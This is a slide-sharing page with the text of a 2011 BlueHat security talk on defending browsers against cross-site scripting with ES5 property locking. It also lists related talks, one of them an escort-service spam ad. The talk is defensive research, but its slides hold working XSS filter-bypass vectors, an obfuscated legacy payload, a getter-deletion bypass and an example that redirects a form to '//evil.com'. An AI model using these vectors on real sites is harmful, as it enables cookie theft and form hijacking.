I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!
 

Último

IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 

Último (20)

IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 

Locking the Throneroom 2.0

  • 1. Locking the Throne Room How ES5+ will change XSS and Client Side Security A presentation by Mario Heiderich BlueHat, Redmond 2011
  • 2. Introduction  Mario Heiderich  Researcher and PhD student at the Ruhr-University, Bochum  Security Researcher for SRLabs, Berlin  Security Researcher for Deutsche Post AG, Bonn  Published author and international speaker  HTML5 Security Cheatsheet / H5SC  PHPIDS Project  Twitter @0x6D6172696F
  • 3. First of all... Buckle Up Take a deep breath A lot of content for a one hour talk We'll be defeating XSS here
  • 4. Today's menu  JavaScript and the DOM  Cross Site Scripting today  Current mitigation approaches  A peek into the petri dishes of current development  A different approach  ES5 and XSS  Some theory first  And some horrific reality  Future work
  • 5. JavaScript and XSS  Cross Site Scripting  One site scripting another  Early vectors abusing Iframes  First published attacks in the late nineties  Three four major variations  Reflected XSS  Persistent XSS  DOM based XSS / DOMXSS  Plug-in XSS  Information theft and modification  Impersonation and leverage of more complex attacks
  • 6. XSS today  An ancient and simple yet unsolved problem  Complexity  Browser bugs  Insecure web applications  Browser plug-ins  Impedance mismatches  Application layer mitigation concepts  New features and spec drafts enabling 0-day attacks  XSS is a user agent problem! Nothing else!
  • 7. Mitigation History  Server side  Native runtime functions, strip_tags(), htmlentities(), etc.  Runtime libraries and request validation  External libraries filtering input and output  HTMLPurifier, AntiSamy, kses, AntiXSS, SafeHTML  HTTPOnly cookies  Client side protection mechanisms  toStaticHTML() in IE8+ and NoScript  IE8+ XSS filter and Webkit XSS Auditor  Protective extensions such as NoScript, NotScripts  Upcoming approaches such as CSP
  • 8. Reliability? We broke every single one of them Numerous times And we enjoyed it – as we will in the future
  • 9. Impedance mismatch  Layer A is unaware of Layer B capabilities and flaws  Layer A deploys the attack  Layer B executes the exploit  Case study:  HTMLPurifier 4.1.1  Server side HTML filter and XSS mitigation library  Internet Explorer 8, CSS expressions and a parser bug  <a style="background:url('/',! @x:expression(write(1))//)!'');"></a>
  • 10. Ancient Goods  HTML+TIME and behaviors 1;--<?f><l ₩ :!!:x /style=`b&#x5c;65h0061vIor/ĸ :url(#def&#x61ult#time2)ö/';'` ₩ /onbegin= &#x5bµ=u00&#054;1le&#114t&#40&#x31)&#x5d&# x2f/&#xyŧ>  http://html5sec.org/what?
  • 11. Further vectors  Plug-in based XSS  Adobe Reader  Java applets  Flash player  Quicktime videos  SVG images  Charset injection and content sniffing  UTF-7 XSS, EBCDIC, MacFarsi, XSS via images  Chameleon files, cross context scripting, local XSS  DOMXSS
  • 12. Quintessence  Server side filtering of client side attacks  Useful and stable for basic XSS protection  Still not remotely sufficient  Affected by charsets, impedance mismatches  Subverted by browser bugs an parser errors  Rendered useless by DOMXSS  Bypassed via plug-in based XSS  Helpless against attacks deployed from different servers  Not suitable for what XSS has become  The server cannot serve protection for the client  And - where will the classic server be in five years?
  • 13. Revisiting XSS  XSS attacks target the client  XSS attacks are being executed client side  XSS attacks aim for client side data and control  XSS attacks impersonate the user  XSS is a client side problem  Sometimes caused by server side vulnerabilities  Sometimes caused by a wide range of problems transparent for the server  Still we try to improve server side XSS filters
  • 14. Idea  Prevention against XSS in the DOM  Capability based DOM security  Inspired by HTTPOnly  Cookies cannot be read by scripts anymore  Why not changing document.cookie to do so  JavaScript up to 1.8.5 enabled this  Unfortunately Non-Standard  Example →
  • 15. __defineGetter__() <script> document.__defineGetter__('cookie', function(){ alert('no cookie access!'); return false; }); </script> … <script> alert(document.cookie) </script>
  • 16. Problems  Proprietary  And not tamper resistant at all  JavaScript supplies a delete operator  Delete operations on DOM properties reset their state  Getter definitions can simply be overwritten  Object getters - invalid for DOM protection purposes  Same for setters and overwritten methods
  • 17. Bypass <script> document.__defineGetter__('cookie', function(){ alert('no cookie access!'); return false; }); </script> … <script> delete document.cookie; alert(document.cookie) </script>
  • 18. Tamper Resistance  First attempts down the prototype chain  document.__proto__.__defineGetter__()  Document.prototype  Attempts to register delete event handlers  Getter and setter definitions for the prototypes  Setter protection for setters  Recursion problems  Interval based workarounds and race conditions  JavaScript 1.8 unsuitable for DOM based XSS protection
  • 19. ECMA Script 5  Older user agents use JavaScript based on ES3  Firefox 3  Internet Explorer 8  Opera 11  The modern ones already ship ES5 compliance  Google Chrome  Safari 5+  Firefox 4+  Internet Explorer 9 and 10pp3
  • 20. Object Extensions  Many novelties in ECMA Script 5  Relevance for client side XSS mitigation  Object extensions such as  Object.freeze() and Object.seal()  Object.getOwnPropertyNames() - a lovely method!  Object.defineProperty() / Object.defineProperties()  Object.preventExtensions()  Less relevant but still interesting  Proxy Objects, useless since no host objects allowed...  More meta-programming APIs  Combinations with DOM Level 3 events
  • 21. ({}).defineProperty()  Object.defineProperty() and ..Properties()  Three parameters  Parent object  Child object to define  Descriptor literal  Descriptors allow to manipulate  Get / Set behavior  Value  “Enumerability”  “Writeability”  “Configurability”  Example →
  • 22. Example <script> Object.defineProperty(document, 'cookie', { get: function(){return:false}, set: function(){return:false}, configurable:false }); </script> … <script> delete document.cookie; alert(document.cookie); </script>
  • 23. configurable:false  Setting “configurability” to false is final  The object description is stronger than delete  Prototype deletion has to effect  Re-definition is not possible  With this method call cookie access can be forbidden  By the developer  And by the attacker
  • 24. Prohibition  Regulating access in general  Interesting to prevent cookie theft  Other properties can be blocked too  Method access and calls can be forbidden  Methods can be changed completely  Horizontal log can be added to any call, access and event  That is for existing HTML elements as well  Example →
  • 25. Action Protection <script> var form = document.getElementById('form'); Object.defineProperty(form, 'action', { set: IDS_detectHijacking, get: IDS_detectStealing, configurable:false }); </script> … <script> document.forms[0].action='//evil.com'; </script>
  • 26. First Roundup  Access prohibition might be effective  Value and argument logging helps detecting attacks  Possible IDS solutions are not affected by heavy string obfuscation  No impedance mismatches  Attacks are detected on they layer they target  Parser errors do not have effect here  No effective charset obfuscations  Immune against plug-in-deployed scripting attacks  Automatic quasi-normalization  It's a blacklist though
  • 27. Going Further  No access prohibitions but RBAC via JavaScript  Possible simplified protocol  Let object A know about permitted accessors  Let accessors of object A be checked by the getter/setter  Let object A react depending on access validity  Seal object A  Execute application logic  Strict policy based approach  A shared secret between could strengthen the policy  Example →
  • 28. RBAC and IDS <script> Object.defineProperty(document, 'cookie', { set:RBAC_checkSetter(IDS_checkArguments()), get:RBAC_checkGetter(IDS_checkArguments()) configurable:false }); // identified via arguments.callee.caller My.allowedMethod(document.cookie); </script> … <script> alert(document.cookie) </script>
  • 29. Forced Introspection  Existing properties can gain capabilities  The added setter will know:  Who attempts to set  What value is being used  The added getter will know:  Who attempts to get  An overwritten function will know:  How the original function looked like  Who calls the function  What arguments are being used  IDS and RBAC are possible  Tamper resistance thanks to configurable:false
  • 30. Case Study I  Stanford JavaScript Crypto Library  AES256, SHA256, HMAC and more in JavaScript  „SJCL is secure“  Not true from an XSS perspective  Global variables  Uses  Math.floor(), Math.max(), Math.random()  document.attachEvent(), native string methods etc.  Any of which can be attacker controlled  High impact vulnerabilities ahead...
  • 31. Case Study II  BeEF – Browser Exploitation Framework  As seen some minutes ago ☺  Uses global variables  window.beef = BeefJS;  Attacker could seal it with Object.defineProperty()  Else the defender could “counterbeef” it  BeEF XSS = Exploiting the exploiter  Maybe a malformed UA string? Or host address?
  • 32. Deployment  Website owners should obey a new rule  „The order of deployment is everything“  As long as trusted content is being deployed first  Object.defineProperty() can protect  Sealing can be used for good  The script deploying first controls the DOM  Persistent, tamper resistant and transparent  Self-defense is possible  Example →
  • 33. !defineProperty() <html> <head> <script> … Object.defineProperty(Object, 'defineProperty' { value:[], configurable:false }); </script> … <script> Object.defineProperty(window,'secret', { get:stealInfo }); // TypeError </script>
  • 34. Reflection  Where are we now with ES5?  Pro:  We can fully restrict property and method access  We have the foundation for a client side IDS and RBAC  We can regulate Object access, extension and modification  CSP and sand-boxed Iframes support this approach  Contra:  It's a blacklist  Magic properties cause problems  We need to prevent creation of a fresh DOM  Right now the DOM sucks!  Still we can approach XSS w/o any obfuscation
  • 35. But now... Enough with the theory already!
  • 36. Experimentation  Publish a totally XSS-able website  1st step: Attribute injections  2nd step: Full HTML injections, implemented as crappily as possible  No server filter at all  Protect it with JavaScript only  Block access to document.cookie  Implement a safe getter  Announce a challenge to break it  Break→Score→Await Fix→Break→Score again  Tough challenge→Evolutionary Result-Set→Extra Learning
  • 37. Code Example document.cookie = '123456-secret-123456'; (function(){ var i,j,x,y; var c = document.cookie; var o = Object.defineProperty; document.cookie=null; o(MouseEvent.prototype, 'isTrusted', {configurable:false}); o(document, 'cookie', {get:function()arguments.callee.caller===Safe.get ? c : null}); x=Object.getOwnPropertyNames(window),x.push('HTMLHeadElement'); for(i in x) { if(/^HTML/.test(x[i])) { for(j in y=['innerHTML', 'textContent', 'text']) { o(window[x[i]].prototype, y[j], {get: function() null}) } } } for(i in x=['wholeText', 'nodeValue', 'data', 'text', 'textContent']) { o(Text.prototype, x[i], {get: function() null}) } })();
  • 38. A Safe Getter? var Safe = {}; Safe.get = function() { var e = arguments.callee.caller; if(e && e.arguments[0].type === 'click' && e.arguments[0].isTrusted === true) { return document.cookie } return null; }; Object.freeze(Safe);  Make sure it's a click  Make really sure it's a click  Make really sure it's a real click  Look good, right?
  • 40. Evaluation by Penetration  Turns out it's been all rubbish  Code was broken 52 times  Spoofing “real” clicks  Overwriting frozen properties  Using Iframes and data URIs  Using XHR from within JavaScript and data URIs  Finding leaking DOM properties  Cloning content into textarea and reading the value  Here's a full list  Code was fixed successfully 52 times  Remainder of an overall of zero “unfixable” bypasses?  Well – almost. And depending on the user agent.  IE? Yes sir! Firefox? Yes - kinda. Rest? Nope
  • 41. Current State  XSSMe¹ still online  http://html5sec.org/xssme  XSSMe² as well  http://xssme.htm5sec.org/  You are welcome to break it  ~14.000 attempts to break it so far  52 succeeded,  52 were ultimately fixed! Thanks plaintext and createHTMLDocument()  XSSMe³ / JSLR is available right now!  http://www.businessinfo.co.uk/labs/jslr/jslr.php  Hat-tips to Gareth Heyes  ~8.000 attempts to break it – of which 15 succeeded (so far) and 14 were fixed  And hopefully there is more to come
  • 42. How's it done?  XSSMe²  Object.getOwnPropertyNames(window).concat( Object.getOwnPropertyNames(Window.prototype))  document.write('<plaintext id=__doc>')  document.implementation.createHTMLDocument()  JSLR/XSSMe³  All of the above  Apply a random ID to any legitimate element  Check against its existence  Wrap JavaScript code in identifier blocks  High security mode – server supported though  Please, please try to break it!
  • 43. So?  Client-side, JavaScript only XSS protection is possible  Is it elegant right now? Noope  Does it work on all modern browsers? Almost! IE and FF doing great  Is it feasible? Yes – but fragile  More fragile than protection allotted over n layers? Noope  What remains to be done?  A small wish-list for the browser vendors!  A possibility to make it work elegantly
  • 44. Future Work I  We need to fix the DOM  Consistency please  Higher prio for DOM bugs – they will be security bugs anyway soon!  Specify a white-list based approach  Fix and refine event handling and DOM properties  DOMFrameContentLoaded  Maybe DOMBeforeSubtreeModified?  Maybe DOMBeforeInsertNode?  The DOM needs more “trustability”  Monitor and contribute to ES6 and ES7  We need DOM Proxies!
  • 45. Future Work II  Talk to W3C people  DOM Sandboxing kinda works – but that's about it  Introduce the features we need to make it elegant  Specify DOMInit, support its implementation  Specify Object.intercept()  White-list based DOM access and caller interception  Details available soon. Or after a beer or two  And finally?  Please let's fix the Java Plugin! Really!  This is sheer horror and breaks everything  Anyone here from Oracle we could talk to?
  • 46. Conclusion  XSS remains undefeated - but lots'a steps forwards were made  RIAs gain complexity and power, WDP and Win8  Client-agnostic server side filters designed to fail  Time for a new approach  Still a lot of work to be done  Client-side XSS protection and more is possible  Just not the most elegant  Still – compare 70 lines of JS to 12091 lines of PHP  Let's get it done already  Hard? Yes. No one said it'd be easy :)
  • 47. Questions  Thanks for your time!  Discussion?  Thanks for advice and contribution:  G. Heyes, S. Di Paola, E. A. Vela Nava  R. Shafigullin, J. Tyson, M. Kinugawa, N. Hippert, M. Nison, K. Kotowicz  D. Ross and M. Caballero  J. Wilander and M. Bergling  J. Magazinius, Phung et al.  All unmentioned contributors